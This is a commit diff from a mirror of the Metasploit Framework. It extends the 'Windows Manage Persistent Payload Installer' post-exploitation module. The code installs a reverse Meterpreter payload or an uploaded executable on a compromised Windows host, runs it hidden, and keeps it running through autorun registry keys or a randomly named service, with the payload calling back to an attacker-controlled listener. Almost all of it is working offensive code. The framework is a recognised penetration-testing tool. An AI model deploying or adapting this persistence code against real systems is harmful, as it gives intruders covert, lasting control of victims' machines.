infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Apply feature #6074

unstable
sinn3r 2011-12-12 12:03:34 -06:00
parent 4e95eb5d34
commit 5ba5bbf077
1 changed files with 98 additions and 43 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

141
modules/post/windows/manage/persistence.rb
View File

@ -27,19 +27,28 @@ class Metasploit3 < Msf::Post
def initialize(info={}) def initialize(info={})
super( update_info( info, super( update_info( info,
'Name' => 'Windows Manage Persistent Payload Installer', 'Name' => 'Windows Manage Persistent Payload Installer',
'Description' => %q{ 'Description' => %q{
This Module will create a boot persistent reverse Meterpreter session by This Module will create a boot persistent reverse Meterpreter session by
installing on the target host the payload as a script that will be executed installing on the target host the payload as a script that will be executed
at user logon or system startup depending on privilege and selected startup at user logon or system startup depending on privilege and selected startup
method. method.
},
'License' => MSF_LICENSE, REXE mode will transfer a binary of your choosing to remote host to be
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'], used as a payload.
'Version' => '$Revision$', },
'Platform' => [ 'windows' ], 'License' => MSF_LICENSE,
'SessionTypes' => [ 'meterpreter' ] 'Author' =>
)) [
'Carlos Perez <carlos_perez[at]darkoperator.com>',
'Merlyn drforbin Cousins <drforbin6[at]gmail.com>'
],
'Version' => '$Revision$',
'Platform' => [ 'windows' ],
'Actions' => [['TEMPLATE'], ['REXE']],
'DefaultAction' => 'TEMPLATE',
'SessionTypes' => [ 'meterpreter' ]
))
register_options( register_options(
[ [
@ -49,6 +58,9 @@ class Metasploit3 < Msf::Post
OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM','SERVICE']]), OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM','SERVICE']]),
OptBool.new('HANDLER', [ false, 'Start a Multi/Handler to Receive the session.', true]), OptBool.new('HANDLER', [ false, 'Start a Multi/Handler to Receive the session.', true]),
OptString.new('TEMPLATE', [false, 'Alternate template Windows PE File to use.']), OptString.new('TEMPLATE', [false, 'Alternate template Windows PE File to use.']),
OptString.new('REXE',[false, 'The remote executable to use.','']),
OptString.new('REXENAME',[false, 'The name to call exe on remote system','']),
OptString.new('ACTION',[true, 'Use TEMPLATE or REXE mode.','TEMPLATE']),
OptEnum.new('PAYLOAD_TYPE', [true, 'Meterpreter Payload Type.', 'TCP',['TCP','HTTP','HTTPS']]) OptEnum.new('PAYLOAD_TYPE', [true, 'Meterpreter Payload Type.', 'TCP',['TCP','HTTP','HTTPS']])
], self.class) ], self.class)
@ -57,7 +69,6 @@ class Metasploit3 < Msf::Post
OptString.new('OPTIONS', [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format.",""]), OptString.new('OPTIONS', [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format.",""]),
OptString.new('ENCODER', [false, "Encoder name to use for encoding.",]), OptString.new('ENCODER', [false, "Encoder name to use for encoding.",]),
OptInt.new('ITERATIONS', [false, 'Number of iterations for encoding.']), OptInt.new('ITERATIONS', [false, 'Number of iterations for encoding.']),
], self.class) ], self.class)
end end
@ -67,6 +78,8 @@ class Metasploit3 < Msf::Post
print_status("Running module against #{sysinfo['Computer']}") print_status("Running module against #{sysinfo['Computer']}")
# Set vars # Set vars
rexe = datastore['REXE']
rexename = datastore['REXENAME']
lhost = datastore['LHOST'] lhost = datastore['LHOST']
lport = datastore['LPORT'] lport = datastore['LPORT']
opts = datastore['OPTIONS'] opts = datastore['OPTIONS']
@ -77,37 +90,56 @@ class Metasploit3 < Msf::Post
host,port = session.tunnel_peer.split(':') host,port = session.tunnel_peer.split(':')
payload = "windows/meterpreter/reverse_tcp" payload = "windows/meterpreter/reverse_tcp"
# Check that if a template is provided that it actually exists if datastore['ACTION'] == 'TEMPLATE'
if datastore['TEMPLATE'] # Check that if a template is provided that it actually exists
if not ::File.exists?(datastore['TEMPLATE']) if datastore['TEMPLATE']
print_error "Template PE File does not exists!" if not ::File.exists?(datastore['TEMPLATE'])
return print_error "Template PE File does not exists!"
else return
template_pe = datastore['TEMPLATE'] else
template_pe = datastore['TEMPLATE']
end
end end
# Set the proper payload
case datastore['STARTUP']
when /TCP/i
payload = "windows/meterpreter/reverse_tcp"
when /HTTP/i
payload = "windows/meterpreter/reverse_http"
when /HTTPS/i
payload = "windows/meterpreter/reverse_https"
end
# Create payload and script
pay = create_payload(payload, lhost, lport, opts = "")
raw = pay_gen(pay,encoder, iterations)
script = create_script(delay, template_pe, raw)
script_on_target = write_script_to_target(script)
else
if datastore['REXE'].nil? or datastore['REXE'].empty?
print_error("Please define REXE")
return
end
if datastore['REXENAME'].nil? or datastore['REXENAME'].empty?
print_error("Please define REXENAME")
return
end
if not ::File.exist?(datastore['REXE'])
print_error("Rexe file does not exist!")
return
end
raw = create_payload_from_file(rexe)
script_on_target = write_exe_to_target(raw,rexename)
end end
# Set the proper payload
case datastore['STARTUP']
when /TCP/i
payload = "windows/meterpreter/reverse_tcp"
when /HTTP/i
payload = "windows/meterpreter/reverse_http"
when /HTTPS/i
payload = "windows/meterpreter/reverse_https"
end
# Create payload and script
pay = create_payload(payload, lhost, lport, opts = "")
raw = pay_gen(pay,encoder, iterations)
script = create_script(delay, template_pe, raw)
# Start handler if set # Start handler if set
create_multihand(payload, lhost, lport) if datastore['HANDLER'] create_multihand(payload, lhost, lport) if datastore['HANDLER']
# Write script to %TEMP% on target
script_on_target = write_script_to_target(script)
# Initial execution of script # Initial execution of script
target_exec(script_on_target) target_exec(script_on_target)
@ -119,6 +151,7 @@ class Metasploit3 < Msf::Post
when /SERVICE/i when /SERVICE/i
install_as_service(script_on_target) install_as_service(script_on_target)
end end
clean_rc = log_file() clean_rc = log_file()
file_local_write(clean_rc,@clean_up_rc) file_local_write(clean_rc,@clean_up_rc)
print_status("Cleanup Meterpreter RC File: #{clean_rc}") print_status("Cleanup Meterpreter RC File: #{clean_rc}")
@ -291,7 +324,9 @@ class Metasploit3 < Msf::Post
#------------------------------------------------------------------------------- #-------------------------------------------------------------------------------
def target_exec(script_on_target) def target_exec(script_on_target)
print_status("Executing script #{script_on_target}") print_status("Executing script #{script_on_target}")
proc = session.sys.process.execute("cscript \"#{script_on_target}\"", nil, {'Hidden' => true}) proc = datastore['ACTION'] == 'REXE' ? session.sys.process.execute(script_on_target, nil, {'Hidden' => true})\
: session.sys.process.execute("cscript \"#{script_on_target}\"", nil, {'Hidden' => true})
print_good("Agent executed with PID #{proc.pid}") print_good("Agent executed with PID #{proc.pid}")
@clean_up_rc << "kill #{proc.pid}\n" @clean_up_rc << "kill #{proc.pid}\n"
return proc.pid return proc.pid
@ -305,7 +340,6 @@ class Metasploit3 < Msf::Post
if(key) if(key)
registry_setvaldata("#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",nam,script_on_target,"REG_SZ") registry_setvaldata("#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",nam,script_on_target,"REG_SZ")
print_good("Installed into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}") print_good("Installed into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
#file_local_write(@clean_up_rc, "reg deleteval -k '#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -v #{nam}\n")
else else
print_error("Error: failed to open the registry key for writing") print_error("Error: failed to open the registry key for writing")
end end
@ -313,14 +347,35 @@ class Metasploit3 < Msf::Post
# Function to install payload as a service # Function to install payload as a service
#------------------------------------------------------------------------------- #-------------------------------------------------------------------------------
def install_as_service(script_on_target) def install_as_service(script_on_target)
if not is_uac_enabled? or is_admin? if is_system? or is_admin?
print_status("Installing as service..") print_status("Installing as service..")
nam = Rex::Text.rand_text_alpha(rand(8)+8) nam = Rex::Text.rand_text_alpha(rand(8)+8)
print_status("Creating service #{nam}") print_status("Creating service #{nam}")
service_create(nam, nam, "cscript \"#{script_on_target}\"") datastore['ACTION'] == 'REXE' ? service_create(nam, nam, "cmd /c \"#{script_on_target}\"") : service_create(nam, nam, "cscript \"#{script_on_target}\"")
@clean_up_rc << "execute -H -f sc -a \"delete #{nam}\"\n" @clean_up_rc << "execute -H -f sc -a \"delete #{nam}\"\n"
else else
print_error("Insufficient privileges to create service") print_error("Insufficient privileges to create service")
end end
end end
end
# Function for writing executable to target host
#-------------------------------------------------------------------------------
def write_exe_to_target(vbs,rexename)
tempdir = session.fs.file.expand_path("%TEMP%")
tempvbs = tempdir + "\\" + rexename
fd = session.fs.file.new(tempvbs, "wb")
fd.write(vbs)
fd.close
print_good("Persistent Script written to #{tempvbs}")
@clean_up_rc << "rm #{tempvbs}\n"
return tempvbs
end
def create_payload_from_file(exec)
print_status("Reading Payload from file #{exec}")
return ::IO.read(exec)
end
end